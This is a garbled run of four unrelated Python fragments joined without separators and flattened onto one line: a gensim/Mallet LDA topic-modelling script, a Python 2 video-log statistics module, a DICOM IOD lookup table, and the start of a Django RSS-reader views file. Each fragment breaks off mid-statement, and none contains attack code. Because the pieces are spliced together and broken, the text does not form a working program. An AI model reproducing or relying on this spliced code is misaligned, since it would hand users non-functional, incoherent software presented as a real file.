make\ just take aw know sai good baltimor jetblu lol thank thanks like\ vari might less highest billion nice probabl lot fuck shit sure\ feel dure befor realli work veri chanc see awai onc onli dy aren\ 100 someth thing even happen becaus wai everi much help want think\ fear flight plane fly mai time dai\ 1 2 3 4 5 6 7 8 9 10'.split()) print (len(stoplist)) stoplist.update(stop_words) print(len(stop_words)) print(len(stoplist)) #standardize text -- makes all characters lowercase and removes common stop words text_full = [[word for word in document.lower().split() if word not in stoplist] for document in corpus_full] print(text_full) text_pos = [[word for word in document.lower().split() if word not in stoplist] for document in corpus_pos] text_neg = [[word for word in document.lower().split() if word not in stoplist] for document in corpus_neg] #count number of times that word appears in corpus #pair frequency with respective word in new array from collections import defaultdict frequency = defaultdict(int) for text in text_full: for token in text: frequency[token] += 1 corpus_removeOne_full = [[token for token in text if frequency[token]>1] for text in text_full] frequency = defaultdict(int) for text in text_pos: for token in text: frequency[token] += 1 corpus_removeOne_pos = [[token for token in text if frequency[token]>1] for text in text_pos] frequency = defaultdict(int) for text in text_neg: for token in text: frequency[token] += 1 corpus_removeOne_neg = [[token for token in text if frequency[token]>1] for text in text_neg] from gensim import corpora #add corpora to dictionary dictionary_full = corpora.Dictionary(corpus_removeOne_full) dictionary_pos = corpora.Dictionary(corpus_removeOne_pos) dictionary_neg = corpora.Dictionary(corpus_removeOne_neg) #save dictionary for future reference dictionary_full.save('redditTest_full.dict') dictionary_pos.save('redditTest_pos.dict') #location of document in computer dictionary_neg.save('redditTest_neg.dict') #dict = gensim.corpora.Dictionary.load('redditTest.dict') #assign numeric id to each token in dictionary dictID_full = dictionary_full.token2id dictID_pos = dictionary_pos.token2id dictID_neg = dictionary_neg.token2id #remove empty sentences for text in corpus_removeOne_full: if len(text) == 0: corpus_removeOne_full.remove(text) for text in corpus_removeOne_pos: if len(text) == 0: corpus_removeOne_pos.remove(text) for text in corpus_removeOne_neg: if len(text) == 0: corpus_removeOne_neg.remove(text) #converts each word into vector following same process as example #Bag of Word Corpus of Full Sentiment bow_corpus_full = [dictionary_full.doc2bow(text) for text in corpus_removeOne_full] corpora.MmCorpus.serialize('redditTest_full.mm', bow_corpus_full) corp_full = gensim.corpora.MmCorpus('redditTest_full.mm') from gensim import models tfidf_pos = models.TfidfModel(bow_corpus_full) corpus_tfidf_full = tfidf_pos[bow_corpus_full] #Bag of Word Corpus of Positive Sentiment bow_corpus_pos = [dictionary_pos.doc2bow(text) for text in corpus_removeOne_pos] corpora.MmCorpus.serialize('redditTest_pos.mm', bow_corpus_pos) corp_pos = gensim.corpora.MmCorpus('redditTest_pos.mm') from gensim import models tfidf_pos = models.TfidfModel(bow_corpus_pos) corpus_tfidf_pos = tfidf_pos[bow_corpus_pos] #Bag of Word Corpus of Negative Sentiment bow_corpus_neg = [dictionary_neg.doc2bow(text) for text in corpus_removeOne_neg] corpora.MmCorpus.serialize('redditTest_neg.mm', bow_corpus_neg) corp_neg = gensim.corpora.MmCorpus('redditTest_neg.mm') from gensim import models tfidf_neg = models.TfidfModel(bow_corpus_neg) corpus_tfidf_neg = tfidf_neg[bow_corpus_neg] #LDA Mallet for full corpus mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet' lda_full = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_full, num_topics=9, id2word=dictionary_full, workers=1, alpha=110, random_seed=109, iterations=50) corpus_LDA_full = lda_full[bow_corpus_full] lda_full.print_topics(9) #LDA Mallet for positive corpus mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet' lda_pos = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_pos, num_topics=9, id2word=dictionary_pos, workers=1, alpha=110, random_seed=109, iterations=50) corpus_LDA_pos = lda_pos[bow_corpus_pos] lda_pos.print_topics(9) #LDA Mallet for negative corpus mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet' lda_neg = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_neg, num_topics=9, id2word=dictionary_neg, workers=1, alpha=110, random_seed=109, iterations=50) corpus_LDA_neg = lda_neg[bow_corpus_neg] lda_neg.print_topics(9) import pandas as pd import matplotlib.pyplot as plt import matplotlib.colors as mcolors from sklearn.manifold import TSNE colors = np.array([color for name, color in mcolors.TABLEAU_COLORS.items()]) #t-SNE plot for full corpus n_topics = 9 topic_weights_full = [] for row_list in lda_full[bow_corpus_full]: tmp = np.zeros(n_topics) for i, w in row_list: tmp[i] = w topic_weights_full.append(tmp) arr_full = pd.DataFrame(topic_weights_full).fillna(9).values topic_num_full = np.argmax(arr_full, axis=1) tsne_model_full = TSNE(n_components=3, random_state=None, method='barnes_hut', angle=0.5, init='pca') tsne_lda_full = tsne_model_full.fit_transform(arr_full) sub = str.maketrans("0123456789", "₀₁₂₃₄₅₆₇₈₉") plt.xlabel('t-SNE1'.translate(sub)) plt.ylabel('t-SNE2'.translate(sub)) plt.title('t-SNE Plot of Topics
the referer hostname (domains). """ keys = self.referer_host_hits.keys() keys.sort(lambda x, y: cmp(self.referer_host_hits[y], self.referer_host_hits[x])) keys = keys[:GRAPH_ITEMS_MAX] return keys class Summary(dict): """ A dictionary of SummaryItems that represents a total summary of all files contained in the log. This object provides special methods for retrieving keys sorted on particular criteria, such as the most hits or longest average elapsed time. """ def __init__(self): """ Initialize dictionary, set sane defaults, clear all caches. """ dict.__init__(self) self.pos = 0 self.common_prefix_len = 0 self.ip_hits = {} self.agent_hits = {} self.referer_hits = {} self.referer_host_hits = {} self.reset_caches() self.version = VERSION self.clients = {} self.versions = {} def reset_caches(self): """ Clear all caches so that they are recalculated when sorted keys are requested. This should be called whenever the summary is updated with new information so that new caches are generated that take this new information into account. """ self._keys_hits = None self._keys_elapsed_avg = None self._keys_percent_watched = None self._keys_ip_hits = None self._keys_agent_hits = None self._keys_referer_hits = None self._keys_referer_host_hits = None self._keys_clients = None def calculate_common_prefix(self): """ Recalculate the common prefix length that all files share. This should be called whenever the summary object is updated from the log file. The common prefix length is used when returning file titles and names for simplifying their display in graphs and tables. """ prefix = None if len(self) > 1: for key in self: if prefix == None: prefix = key else: for x in range(len(key), -1, -1): if prefix.startswith(key[:x]): prefix = key[:x] break if prefix == "": break elif len(self) == 1: prefix = os.path.dirname(self.keys()[0]) + "/" if prefix: self.common_prefix_len = len(prefix) else: self.common_prefix_len = 0 def keys_hits(self): """ Return a list of keys sorted by the total number of hits per file, sorted from most hits to fewest. """ if self._keys_hits: return self._keys_hits keys = self.keys() keys.sort(lambda x, y: cmp(self[y].hits, self[x].hits)) #keys = keys[:GRAPH_ITEMS_MAX] self._keys_hits = keys return keys def keys_hits_titles(self): """ Return a list of keys sorted by the total number of hits per file, with each element either the title of the video (if available) or the file name of the video minus any common prefix that all file names have in common. """ return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_hits()] def keys_elapsed_avg(self): """ Return a list of keys sorted by the average elapsed time per file, sorted from longest to shortest. """ if self._keys_elapsed_avg: return self._keys_elapsed_avg keys = self.keys() keys.sort(lambda x, y: cmp(self[y].elapsed_avg, self[x].elapsed_avg)) keys = keys[:GRAPH_ITEMS_MAX] self._keys_elapsed_avg = keys return keys def keys_elapsed_avg_titles(self): """ Return a list of keys sorted by the average_elapsed time per file, with each element either the title of the video (if available) or the file name of the video minus any common prefix that all file names have in common. """ return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_elapsed_avg()] def keys_percent_watched(self): """ Return a list of keys sorted by the percent of the file that was watched, sorted from highest to lowest. """ if self._keys_percent_watched: return self._keys_percent_watched keys = self.keys() keys.sort(lambda x, y: cmp(self[y].percent_watched, self[x].percent_watched)) keys = keys[:GRAPH_ITEMS_MAX] self._keys_percent_watched = keys return keys def keys_percent_watched_titles(self): """ Return a list of keys sorted by the percent of the file that was watched, with each element either the title of the video (if available) or the file name of the video minus any common prefix that all file names have in common. """ return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_percent_watched()] def keys_ip_hits(self): """ Return a list of IPs, sorted by the number of hits per IP, from highest to lowest. """ if self._keys_ip_hits: return self._keys_ip_hits keys = self.ip_hits.keys() keys.sort(lambda x, y: cmp(self.ip_hits[y], self.ip_hits[x])) keys = keys[:GRAPH_ITEMS_MAX] self._keys_ip_hits = keys return keys def keys_referer_hits(self): """ Return a list of referers, sorted by the number of hits per referer, from highest to lowest. """ if self._keys_referer_hits: return self._keys_referer_hits keys = self.referer_hits.keys() keys.sort(lambda x, y: cmp(self.referer_hits[y], self.referer_hits[x])) keys = keys[:GRAPH_ITEMS_MAX] self._keys_referer_hits = keys return keys def keys_referer_host_hits(self): """ Return a list of referer hosts, sorted by the number of hits per referer, from highest to lowest. """ if self._keys_referer_host_hits: return self._keys_referer_host_hits keys = self.referer_host_hits.keys() keys.sort(lambda x, y: cmp(self.referer_host_hits[y], self.referer_host_hits[x])) keys = keys[:GRAPH_ITEMS_MAX] self._keys_referer_host_hits = keys return keys def keys_agent_hits(self): """ Return a list of user agents, sorted by the number of hits per user agent, from highest to lowest. """ if self._keys_agent_hits: return self._keys_agent_hits keys = self.agent_hits.keys() keys.sort(lambda x, y: cmp(self.agent_hits[y], self.agent_hits[x])) keys = keys[:GRAPH_ITEMS_MAX] self._keys_agent_hits = keys return keys def keys_hits_by_ip(self, ip): """ Return a tuple of (hits, keys) where hits is a dict corresponding to the number of hits per file from a particular ip and keys are the keys (file names) sorted by hits in increasing order. """ file_hits = {} for filename in self: for address in self[filename].ips: if address == ip: if filename not in file_hits: file_hits[filename] = 0 file_hits[filename] += 1 top_files_keys = file_hits.keys() top_files_keys.sort(lambda x, y: cmp(file_hits[y], file_hits[x])) return (file_hits, top_files_keys) def keys_hits_by_ip_titles(self, ip): """ Return a list of keys sorted by the number of hits per file, with each element either the title of the video (if available) or the file name of the video minus any common prefix that all file names have in common. """ hits, keys = self.keys_hits_by_ip(ip) return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in keys] def keys_clients(self): """ Return a list of clients sorted by the number of hits. """ if self._keys_clients: return self._keys_clients keys = self.clients.keys() keys.sort(lambda x, y: cmp(self.clients[y], self.clients[x])) self._keys_clients = keys return keys class Graph(graph): """ The default base graph for Simple Stats graphs that defines some color and style information and simplifies several methods. """ def __init__(self, title): graph.__init__(self) self.bg_colour = GRAPH_BACKGROUND_COLOR self.y_max = 100 self.title(title) self.set_x_axis_3d(12) self.x_axis_colour = GRAPH_GRID_COLOR self.x_grid_colour = GRAPH_GRID_COLOR self.y_axis_colour = GRAPH_GRID_COLOR self.y_grid_colour = GRAPH_GRID_COLOR self.set_x_label_style(8, GRAPH_LABEL_COLOR, 2) self.set_y_label_style(8, GRAPH_LABEL_COLOR) self.set_x_legend("Videos") self.set_y_legend("Hits") def title(self, text): graph.title(self, text, "{font-size:20px; color:%s;}" % GRAPH_TITLE_COLOR) def bar_3d(self, color, name): graph.bar_3d(self, GRAPH_BAR_OPACITY, color, name, 10) def set_y_legend(self, name): graph.set_y_legend(self, name, 12, GRAPH_LABEL_COLOR) def set_x_legend(self, name): graph.set_x_legend(self, name, 12, GRAPH_LABEL_COLOR) class GraphObject(graph_object): """ Override the default graph renderer. """ def __init__(self, options): self.path = options.server_path def render(self, width, height, data_url): """ Render this graph using the server path given to Simple Stats. """ return graph_object.render(self, width, height, data_url, self.path + os.path.sep) def title_constrain(title): """ Constrain the length of a title to GRAPH_MAX_LABEL_LENGTH characters. This method also URL-escapes the string for graph use. """ if len(title) > GRAPH_MAX_LABEL_LENGTH: title = "..." + title[-(GRAPH_MAX_LABEL_LENGTH - 3):] return quote(title) def sec_to_str(sec): """ Return a nice string given a number of seconds, such as 21:53. Takes into account hours, minutes, and seconds. """ s = "" if sec < 0: return "Unknown" hours = sec / 3600 min = (sec % 3600) / 60 sec = sec % 60 if hours: s += str(hours) + ":" if min and min < 10 and hours: s += "0" + str(min) + ":" elif min: s += str(min) + ":" if sec < 10 and min: s += "0" s += str(sec) return s def percent_to_str(percent): """ Return a nice string given a percentage. """ s = "" if percent < 0: return "Unknown" return str(int(percent)) + "%" def sanitize_filename(filename): """ Return a sanitized file path with certain characters replaced. """ return filename.replace(":", "_").replace("/", "_") def query(query_string, data): """ Return a query string for use in HTML links. For example, if query_string is "?page=foo" and data is "date=200807" this function will return "?page=foo&date=200807" while if query_string were ""
['Series'], 'HEMODYNAMIC IOD': ['Series'], 'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'], 'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'], 'VIDEO MICROSCOPIC IMAGE IOD': ['Series'], 'ENHANCED MR COLOR IMAGE IOD': ['Series'], 'ENHANCED CT IMAGE IOD': ['Series'], 'X-RAY RADIATION DOSE SR IOD': ['Series'], 'AUTOREFRACTION MEASUREMENTS IOD': ['Series'], 'PROCEDURE LOG IOD': ['Series'], 'IMPLANTATION PLAN SR DOCUMENT IOD': ['Series'], 'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'], 'STEREOMETRIC RELATIONSHIP IOD': ['Series'], 'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'], 'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'], 'VL ENDOSCOPIC IMAGE IOD': ['Series'], 'KERATOMETRY MEASUREMENTS IOD': ['Series'], 'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'], 'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'], 'COMPREHENSIVE SR IOD': ['Series'], 'ENHANCED ULTRASOUND VOLUME IOD': ['Series'], 'KEY OBJECT SELECTION DOCUMENT IOD': ['Series'], 'SPATIAL FIDUCIALS IOD': ['Series'], 'RT ION PLAN IOD': ['Series'], 'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'], 'CT IMAGE IOD': ['Series'], 'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'], 'RT ION BEAMS TREATMENT RECORD IOD': ['Series'], 'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'], 'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'RT DOSE IOD': ['Series'], 'AMBULATORY ECG IOD': ['Series'], 'SURFACE SEGMENTATION IOD': ['Series'], 'MAMMOGRAPHY CAD SR IOD': ['Series'], 'VL MICROSCOPIC IMAGE IOD': ['Series'], 'RT BEAMS TREATMENT RECORD IOD': ['Series'], 'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'], 'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'], 'RT IMAGE IOD': ['Series'], 'SC IMAGE IOD': ['Series'], None: ['Series'], 'SEGMENTATION IOD': ['Series'], 'PET IMAGE IOD': ['Series'], 'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'DIGITAL X-RAY IMAGE IOD': ['Series'], 'REAL WORLD VALUE MAPPING IOD': ['Series'], 'SPATIAL REGISTRATION IOD': ['Series'], 'COLON CAD SR IOD': ['Series'], 'INTRAVASCULAR OCT IMAGE IOD': ['Series'], 'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'ENHANCED PET IMAGE IOD': ['Series'], 'VISUAL ACUITY MEASUREMENTS IOD': ['Series'], 'US MULTI-FRAME IMAGE IOD': ['Series'], 'ENHANCED X-RAY RF IMAGE IOD': ['Series'], 'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'], 'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'], 'US IMAGE IOD': ['Series'], 'GENERAL ECG IOD': ['Series'], 'XRF IMAGE IOD': ['Series'], 'ENCAPSULATED CDA IOD': ['Series'], 'ENHANCED SR IOD': ['Series'], 'VL PHOTOGRAPHIC IMAGE IOD': ['Series'], 'GENERAL AUDIO WAVEFORM IOD': ['Series'], 'MR IMAGE IOD': ['Series'], 'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'], 'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'], 'ARTERIAL PULSE WAVEFORM IOD': ['Series'], }, # ClinicalTrialSeriesDescription 0x00120072L: { 'BASIC STRUCTURED DISPLAY IOD': ['Series'], 'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Series'], 'RT BRACHY TREATMENT RECORD IOD': ['Series'], 'RT STRUCTURE SET IOD': ['Series'], 'RT PLAN IOD': ['Series'], 'CR IMAGE IOD': ['Series'], 'RAW DATA IOD': ['Series'], 'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Series'], 'ENHANCED MR IMAGE IOD': ['Series'], 'BASIC CARDIAC EP IOD': ['Series'], 'RT TREATMENT SUMMARY RECORD IOD': ['Series'], '12-LEAD ECG IOD': ['Series'], 'RESPIRATORY WAVEFORM IOD': ['Series'], 'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Series'], 'BREAST TOMOSYNTHESIS IMAGE IOD': ['Series'], 'BASIC VOICE AUDIO IOD': ['Series'], 'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Series'], 'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'], 'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Series'], 'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Series'], 'SPECTACLE PRESCIPTION REPORT IOD': ['Series'], 'BASIC TEXT SR IOD': ['Series'], 'NM IMAGE IOD': ['Series'], 'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'LENSOMETRY MEASUREMENTS IOD': ['Series'], 'MR SPECTROSCOPY IOD': ['Series'], 'ENCAPSULATED PDF IOD': ['Series'], 'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Series'], 'CHEST CAD SR IOD': ['Series'], 'HEMODYNAMIC IOD': ['Series'], 'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'], 'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'], 'VIDEO MICROSCOPIC IMAGE IOD': ['Series'], 'ENHANCED MR COLOR IMAGE IOD': ['Series'], 'ENHANCED CT IMAGE IOD': ['Series'], 'X-RAY RADIATION DOSE SR IOD': ['Series'], 'AUTOREFRACTION MEASUREMENTS IOD': ['Series'], 'PROCEDURE LOG IOD': ['Series'], 'IMPLANTATION PLAN SR DOCUMENT IOD': ['Series'], 'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'], 'STEREOMETRIC RELATIONSHIP IOD': ['Series'], 'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'], 'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'], 'VL ENDOSCOPIC IMAGE IOD': ['Series'], 'KERATOMETRY MEASUREMENTS IOD': ['Series'], 'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'], 'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'], 'COMPREHENSIVE SR IOD': ['Series'], 'ENHANCED ULTRASOUND VOLUME IOD': ['Series'], 'KEY OBJECT SELECTION DOCUMENT IOD': ['Series'], 'SPATIAL FIDUCIALS IOD': ['Series'], 'RT ION PLAN IOD': ['Series'], 'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'], 'CT IMAGE IOD': ['Series'], 'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'], 'RT ION BEAMS TREATMENT RECORD IOD': ['Series'], 'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'], 'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'RT DOSE IOD': ['Series'], 'AMBULATORY ECG IOD': ['Series'], 'SURFACE SEGMENTATION IOD': ['Series'], 'MAMMOGRAPHY CAD SR IOD': ['Series'], 'VL MICROSCOPIC IMAGE IOD': ['Series'], 'RT BEAMS TREATMENT RECORD IOD': ['Series'], 'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'], 'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'], 'RT IMAGE IOD': ['Series'], 'SC IMAGE IOD': ['Series'], None: ['Series'], 'SEGMENTATION IOD': ['Series'], 'PET IMAGE IOD': ['Series'], 'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'DIGITAL X-RAY IMAGE IOD': ['Series'], 'REAL WORLD VALUE MAPPING IOD': ['Series'], 'SPATIAL REGISTRATION IOD': ['Series'], 'COLON CAD SR IOD': ['Series'], 'INTRAVASCULAR OCT IMAGE IOD': ['Series'], 'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'], 'ENHANCED PET IMAGE IOD': ['Series'], 'VISUAL ACUITY MEASUREMENTS IOD': ['Series'], 'US MULTI-FRAME IMAGE IOD': ['Series'], 'ENHANCED X-RAY RF IMAGE IOD': ['Series'], 'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'], 'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'], 'US IMAGE IOD': ['Series'], 'GENERAL ECG IOD': ['Series'], 'XRF IMAGE IOD': ['Series'], 'ENCAPSULATED CDA IOD': ['Series'], 'ENHANCED SR IOD': ['Series'], 'VL PHOTOGRAPHIC IMAGE IOD': ['Series'], 'GENERAL AUDIO WAVEFORM IOD': ['Series'], 'MR IMAGE IOD': ['Series'], 'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'], 'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'], 'ARTERIAL PULSE WAVEFORM IOD': ['Series'], }, # InstanceNumber 0x00200013L: { 'HANGING PROTOCOL IOD': ['Hanging Protocol'], 'BASIC STRUCTURED DISPLAY IOD': ['Presentation State'], 'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Image'], 'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'], 'RT ION MACHINE VERIFICATION IOD': ['Rt Ion Machine Verification'], 'RT STRUCTURE SET IOD': ['Structure Set'], 'RT PLAN IOD': ['Plan'], 'FILM SESSION IOD': ['Film Session'], 'BASIC FILM BOX IOD': ['Basic Film Box'], 'CR IMAGE IOD': ['Image'], 'RAW DATA IOD': ['Raw Data'], 'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'], 'ENHANCED MR IMAGE IOD': ['Image'], 'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'], 'BASIC CARDIAC EP IOD': ['Waveform'], 'RT TREATMENT SUMMARY RECORD IOD': ['Treatment Record'], 'MODALITY PERFORMED PROCEDURE STEP IOD': ['Modality Performed Procedure Step'], '12-LEAD ECG IOD': ['Waveform'], 'RESPIRATORY WAVEFORM IOD': ['Waveform'], 'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Image'], 'BREAST TOMOSYNTHESIS IMAGE IOD': ['Image'], 'BASIC VOICE AUDIO IOD': ['Waveform'], 'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'], 'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'], 'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'], 'COLOR PALETTE IOD': ['Color Palette'], 'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Image'], 'SPECTACLE PRESCIPTION REPORT IOD': ['Document'], 'BASIC TEXT SR IOD': ['Document'], 'NM IMAGE IOD': ['Image'], 'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Presentation State'], 'LENSOMETRY MEASUREMENTS IOD': ['Equipment'], 'MR SPECTROSCOPY IOD': ['Equipment'], 'ENCAPSULATED PDF IOD': ['Encapsulated Document'], 'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Image'], 'CHEST CAD SR IOD': ['Document'], 'HEMODYNAMIC IOD': ['Waveform'], 'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Equipment'], 'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'], 'VIDEO MICROSCOPIC IMAGE IOD': ['Image'], 'ENHANCED MR COLOR IMAGE IOD': ['Image'], 'INSTANCE AVAILABILITY NOTIFICATION IOD': ['Instance Availability Notification'], 'X-RAY RADIATION DOSE SR IOD': ['Document'], 'AUTOREFRACTION MEASUREMENTS IOD': ['Equipment'], 'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'], 'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'], 'SPATIAL REGISTRATION IOD': ['Spatial Registration'], 'ENHANCED X-RAY RF IMAGE IOD': ['Image'], 'INTRAOCULAR LENS CALCULATIONS IOD': ['Equipment'], 'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Image'], 'VL ENDOSCOPIC IMAGE IOD': ['Image'], 'KERATOMETRY MEASUREMENTS IOD': ['Equipment'], 'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Image'], 'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Image'], 'COMPREHENSIVE SR IOD': ['Document'], 'ENHANCED ULTRASOUND VOLUME IOD': ['Image'], 'KEY OBJECT SELECTION DOCUMENT IOD': ['Series', 'Document'], 'SPATIAL FIDUCIALS IOD': ['Spatial Fiducials'], 'RT ION PLAN IOD': ['Plan'], 'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'], 'CT IMAGE IOD': ['Image'], 'ENHANCED CT IMAGE IOD': ['Image'], 'PRINT JOB IOD': ['Print Job'], 'RT CONVENTIONAL MACHINE VERIFICATION IOD': ['Rt Conventional Machine Verification'], 'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'], 'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'], 'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'], 'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Presentation State'], 'RT DOSE IOD': ['Dose'], 'BASIC ANNOTATION BOX IOD': ['Basic Annotation Box'], 'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'], 'AMBULATORY ECG IOD': ['Waveform'], 'PRINTER IOD': ['Printer'], 'PRINTER CONFIGURATION IOD': ['Printer Configuration'], 'SURFACE SEGMENTATION IOD': ['Surface'], 'MAMMOGRAPHY CAD SR IOD': ['Document'], 'VL MICROSCOPIC IMAGE IOD': ['Image'], 'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'], 'DEFORMABLE SPATIAL REGISTRATION IOD': ['Deformable Registration'], 'IMPLANT ASSEMBLY TEMPLATE
<gh_stars>1-10 import datetime import time import boto import redis import requests import random import zlib from django.shortcuts import get_object_or_404 from django.shortcuts import render from django.contrib.auth.decorators import login_required from django.template.loader import render_to_string from django.db import IntegrityError from django.db.models import Q from django.views.decorators.cache import never_cache from django.core.urlresolvers import reverse from django.contrib.auth import login as login_user from django.contrib.auth import logout as logout_user from django.contrib.auth.models import User from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404, UnreadablePostError from django.conf import settings from django.core.mail import mail_admins #from django.core.validators import email_re from django.core.validators import EmailValidator from django.core.exceptions import ValidationError from django.core.validators import validate_email from django.core.mail import EmailMultiAlternatives from django.contrib.sites.models import Site from django.utils import feedgenerator from django.utils.encoding import smart_unicode from mongoengine.queryset import OperationError from mongoengine.queryset import NotUniqueError from apps.recommendations.models import RecommendedFeed from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag from apps.analyzer.models import apply_classifier_titles, apply_classifier_feeds from apps.analyzer.models import apply_classifier_authors, apply_classifier_tags from apps.analyzer.models import get_classifiers_for_user, sort_classifiers_by_feed from apps.profile.models import Profile from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory, Feature from apps.reader.forms import SignupForm, LoginForm, FeatureForm from apps.rss_feeds.models import MFeedIcon, MStarredStoryCounts from apps.search.models import MUserSearch from apps.statistics.models import MStatistics # from apps.search.models import SearchStarredStory try: from apps.rss_feeds.models import Feed, MFeedPage, DuplicateFeed, MStory, MStarredStory except: pass from apps.social.models import MSharedStory, MSocialProfile, MSocialServices from apps.social.models import MSocialSubscription, MActivity, MInteraction from apps.categories.models import MCategory from apps.social.views import load_social_page from apps.rss_feeds.tasks import ScheduleImmediateFetches from utils import json_functions as json from utils.user_functions import get_user, ajax_login_required from utils.feed_functions import relative_timesince from utils.story_functions import format_story_link_date__short from utils.story_functions import format_story_link_date__long from utils.story_functions import strip_tags from utils import log as logging from utils.view_functions import get_argument_or_404, render_to, is_true from utils.view_functions import required_params from utils.ratelimit import ratelimit from vendor.timezones.utilities import localtime_for_timezone BANNED_URLS = [ "brentozar.com", ] @never_cache @render_to('reader/dashboard.xhtml') def index(request, **kwargs): if request.method == "GET" and request.subdomain and request.subdomain not in ['dev', 'www', 'debug']: username = request.subdomain if '.' in username: username = username.split('.')[0] user = User.objects.filter(username=username) if not user: user = User.objects.filter(username__iexact=username) if user: user = user[0] if not user: return HttpResponseRedirect('http://%s%s' % ( Site.objects.get_current().domain, reverse('index'))) return load_social_page(request, user_id=user.pk, username=request.subdomain, **kwargs) if request.user.is_anonymous(): return welcome(request, **kwargs) else: return dashboard(request, **kwargs) def dashboard(request, **kwargs): user = request.user feed_count = UserSubscription.objects.filter(user=request.user).count() recommended_feeds = RecommendedFeed.objects.filter(is_public=True, approved_date__lte=datetime.datetime.now() ).select_related('feed')[:2] unmoderated_feeds = [] if user.is_staff: unmoderated_feeds = RecommendedFeed.objects.filter(is_public=False, declined_date__isnull=True 